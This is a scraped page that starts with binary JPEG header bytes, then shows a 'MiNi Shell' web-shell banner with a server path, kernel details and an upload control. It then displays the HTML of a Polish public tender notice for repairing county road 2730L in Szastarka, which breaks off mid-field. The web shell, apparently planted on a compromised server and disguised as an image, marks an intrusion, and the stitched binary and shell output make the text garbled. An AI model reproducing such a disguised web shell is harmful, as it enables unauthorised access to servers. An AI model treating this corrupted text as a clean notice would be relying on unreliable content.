JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240813/0045645901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi powiatowej nr 2730L w gminie Szastarka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Kraśniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029369</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraśnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 8264126</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp-krasnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zdp-krasnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi powiatowej nr 2730L w gminie Szastarka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-21f501bf-d798-4799-b2bb-ca1eb6821f77</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00456459</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdp-powiatkrasnicki.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu<br/>Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz<br/>informacji elektronicznie za pośrednictwem Platformy znajdującej się pod adresem: https://zdp-powiatkrasnicki.ezamawiajacy.pl w<br/>zakładce „Korespondencja”. 2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za<br/>dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu<br/>oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie. 3.Ogólne zasady<br/>korzystania z Platformy, z zastrzeżeniem pkt 8 niniejszego rozdziału: 3.1. Zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemu na subdomenie https://zdp-powiatkrasnicki.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl .3.2. Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;.<br/>3.3. Rejestracja Wykonawcy trwa maksymalnie 6<br/>godzin, w związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia<br/>Oferty w postaci<br/>elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>3.4. Po założeniu konta Wykonawca<br/>ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności<br/>zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę<br/>przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”. 4.<br/>Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie<br/>treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy<br/>Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. 5. Treść pytań (bez ujawniania źródła zapytania)<br/>wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ,<br/>Zamawiający zamieści za pośrednictwem Platformy Zakupowej. 6.Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości<br/>związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa, tel. +48 22 257 22 23 (infolinia dostępna<br/>w dni robocze, w godzinach 9.00-17.00) email:<br/>oneplace@marketplanet.pl. 7. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako: 7.1. Dokumenty w formacie<br/>„pdf&#34; zaleca się podpisywać formatem PAdES. 7.2.<br/>Dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z<br/>tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem. 8. Zamawiający określa<br/>niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: 8.1. Stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s; 8.2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min<br/>2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; 8.3. Zainstalowana dowolna przeglądarka internetowa<br/>obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0; 8.4. Włączona obsługa<br/>JavaScript; 8.5.<br/>Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 1)administratorem Pani/Pana danych<br/>osobowych<br/>jest:Zarządu Dróg Powiatowych w Kraśniku,reprezentowany przez Dyrektora Zarządu Dróg Powiatowych, ul.Szpitalna 2A, 23-204<br/>Kraśnik tel.(+48) 81 8264126, fax: (+48) 81 8251027, e-mail: sekretariat@zdp-krasnik.pl; 2)kontakt z Inspektorem Ochrony Danych:<br/>adres e-mail: abi@powiatkrasnicki.pl; Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c. Zamówienie<br/>udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego pn.: &#34;Remont drogi powiatowej nr 2730L w gminie Szastarka&#34;(oznaczenie<br/>sprawy: ZDP/3/TP/2024) prowadzonym w trybie podstawowym; 3)odbiorcami Pani/Pana danych osobowych będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11września<br/>2019 r. – Prawo zamówień publicznych (tekst jedn. Dz. U. z 2023 r. poz.1605 z późn. zm.),dalej „ustawa Pzp”; 4)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy; 5)obowiązek podania przez Panią/Pana danych osobowych<br/>bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 6) w<br/>odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; 7) posiada Pani/Pan:a)na podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;b)na<br/>podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych *;c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>**; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO; 8) nie<br/>przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;b) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO;c) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO 9) odbiorcą Pani/Pana danych osobowych będą<br/>upoważnieni pracownicy Zarządu Dróg Powiatowych w Kraśniku oraz spółka<br/>Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców<br/>Krajowego Rejestru Sądowego,prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy<br/>Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel<br/>Platformy Zakupowej, na której Zarządu Dróg Powiatowych w Kraśniku prowadzi postępowania o udzielenie zamówienia<br/>publicznego, działającą pod adresem: https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/3/TP/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest remont drogi powiatowej nr 2730L w gminie Szastarka.<br/>Przebudowa drogi realizowana będzie na odcinku od km 0+000 do km 0+850.<br/>2. Określenie zakresu zamówienia/podstawowe elementy robót: roboty przygotowawcze i rozbiórkowe, roboty ziemne, podbudowy, roboty nawierzchniowe,zjazdy,parking,roboty wykończeniowe. Szczegółowe ilości robót przewidzianych do wykonania określono w załączonym do SWZ przedmiarze robót i kosztorysie ofertowym(Załącznik nr 2). Zasady prowadzenia i odbioru robót budowlanych związanych z przebudową ww.<br/>drogi określają Szczegółowe specyfikacje techniczne wykonania i odbioru robót (załączone do SWZ).<br/>4. Szczegółowy opis przedmiotu zamówienia określa:<br/>- Dokumentacja techniczna(do zgłoszenia robót budowlanych),<br/>- Szczegółowe specyfikacje techniczne wykonania i odbioru robót.<br/><br/>5.Realizacja przedmiotu zamówienia winna być wykonana w oparciu o obowiązujące przepisy a w szczególności ustawy z<br/>dnia 7 lipca 1994 roku Prawo budowlane (tekst jedn. Dz.U. z 2023 r, poz. 682 ze zm.) wraz z przepisami wykonawczymi, a<br/>w szczególności: rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022r. w sprawie przepisów<br/>techniczno-budowlanych dotyczących dróg publicznych (Dz.U. z 2022r., poz. 1518), przez Wykonawcę posiadającego<br/>stosowne doświadczenie i potencjał wykonawczy, określony w SWZ, oraz przez osoby posiadające<br/>odpowiednie kwalifikacje i doświadczenie.<br/>6.Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia, za jakość,<br/>zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.<br/>7.Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności<br/>objętej przedmiotem niniejszego zamówienia.<br/>8.Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu zamówienia robót zamiennych w stosunku<br/>do przewidywanych dokumentacją projektową sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj.<br/>zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami.<br/>9.Zamawiający wymaga przed podpisaniem umowy wskazania wytwórni mas bitumicznych w której będzie wyprodukowana masa bitumiczna do realizacji przedmiotowego zamówienia. Lokalizacja winna spełniać warunek czasu transportu mas bitumicznych od zakończenia załadunku do momentu rozpoczęcia wbudowywania – do 2 godz.<br/>10.Materiały użyte przez Wykonawcę powinny odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i<br/>stosowania w budownictwie, określonym w art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2023 r. poz. 682<br/>ze zm.).<br/>11.Wykonanie przedmiotu zamówienia i oddanie do użytkowania musi być również zgodne z wszystkimi aktami prawnymi<br/>właściwymi dla przedmiotu zamówienia, z przepisami techniczno – budowlanymi, obowiązującymi normami, wytycznymi<br/>oraz zasadami wiedzy technicznej.<br/>12.Zamawiający nie wymaga od Wykonawcy konieczności odbycia wizji lokalnej lub sprawdzenia przez Wykonawcę<br/>dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego.<br/>13.Zamawiający na podstawie art. 95 ust.1 ustawy Pzp określa obowiązek zatrudnienia na podstawie stosunku pracy<br/>wszystkich osób wykonujących następujące niżej określone czynności w zakresie realizacji przedmiotu zamówienia.<br/>Zamawiający, na podstawie art. 95 ust. 2 ustawy Pzp, określa następujące wymagania dotyczące zatrudnienia przez<br/>Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego<br/>czynności, w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22<br/>§ 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2023 r. poz. 1465):<br/>1) rodzaj czynności związanych z realizacją zamówienia, których dotyczą wymagania zatrudnienia na podstawie stosunku<br/>pracy przez Wykonawcę lub podwykonawcę, osób wykonujących czynności w trakcie realizacji zamówienia: wszystkie<br/>czynności bezpośrednio związane z wykonywaniem robót, czyli czynności tzw. pracowników fizycznych w tym<br/>także operatorów sprzętu i urządzeń (wymóg nie dotyczy m.in. osób kierujących budową, wykonujących obsługę geodezyjną<br/>czy dostawców materiałów budowlanych),<br/>2) sposób weryfikacji zatrudnienia tych osób:<br/>Wykonawca, najpóźniej w dniu przekazania placu budowy przedłoży Zamawiającemu oświadczenie, że osoby wykonujące<br/>czynności bezpośrednio związane z wykonywaniem robót są zatrudnione, na podstawie umowy o pracę, zarówno przez<br/>Wykonawcę, jak i podwykonawców.<br/>3) uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnianiem tych<br/>osób oraz sankcji z tytułu niespełnienia tych wymagań: w okresie realizacji zamówienia Zamawiający ma prawo do<br/>skierowania wniosku do inspektoratu pracy o przeprowadzenie kontroli. Niespełnienie wymagań, o których mowa w pkt 1,<br/>skutkuje sankcjami określonymi w § 25 ust.1 pkt j wzoru umowy<br/>stanowiącej Załącznik nr 9 do SWZ.<br/>14.Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w<br/>odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - Zamawiający, zgodnie z art.<br/>99 ust. 5 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące<br/>od konkretnych producentów określają minimalne parametry jakościowe, cechy użytkowe, jakim muszą odpowiadać<br/>materiały lub urządzenia oferowane przez Wykonawcę, aby zostały spełnione wymagania stawiane przez Zamawiającego.<br/>Materiały lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec jakościowy przedmiotu<br/>zamówienia. Pod pojęciem „minimalne parametry jakościowe i cechy użytkowe” Zamawiający rozumie wymagania<br/>dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych<br/>producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań<br/>Zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie<br/>charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy<br/>opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach<br/>użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych<br/>lub lepszych parametrach.<br/>15.Zamawiający, w każdym przypadku, gdy opisuje przedmiot zamówienia poprzez odniesienie do norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, dopuszcza rozwiązania równoważne<br/>opisywanym.<br/>16.Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany<br/>wykazać, że oferowane przez niego roboty budowlane, spełniają wymagania określone przez Zamawiającego. W takiej<br/>sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających rozwiązania równoważne.<br/>Wykonawca może, przy pomocy innych dokumentów wykazać, że oferowane przez niego rozwiązania równoważne<br/>spełniają wymogi wynikające ze wskazanych norm lub odpowiednich specyfikacji technicznych. Zamawiający zastrzega<br/>sobie prawo wystąpienia do autora Projektu budowlano-wykonawczego o opinię na temat oferowanych materiałów lub<br/>urządzeń. Opinia ta może stanowić podstawę do podjęcia przez zamawiającego decyzji o przyjęciu materiałów lub urządzeń<br/>równoważnych albo odrzuceniu oferty z powodu braku równoważności.<br/>17.Wykonawca zobowiązany jest udzielić gwarancji na wykonane roboty budowlane (w tym także oznakowanie poziome)<br/>oraz na zamontowane urządzenia i materiały na okres wskazany z formularzu oferty. Warunki gwarancji opisuje projekt<br/>umowy. Długość okresu gwarancji - stanowi również kryterium oceny ofert. Zamawiający określa go na okres w przedziale<br/>od 3 lat (termin minimalny) do 5 lat (termin maksymalny) od dnia podpisania protokołu odbioru końcowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nie odrzuconych<br/>ofert. Szczegółowy opis kryteriów oceny ofert wymienionych poniżej oraz sposób oceny zawarty jest w rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) 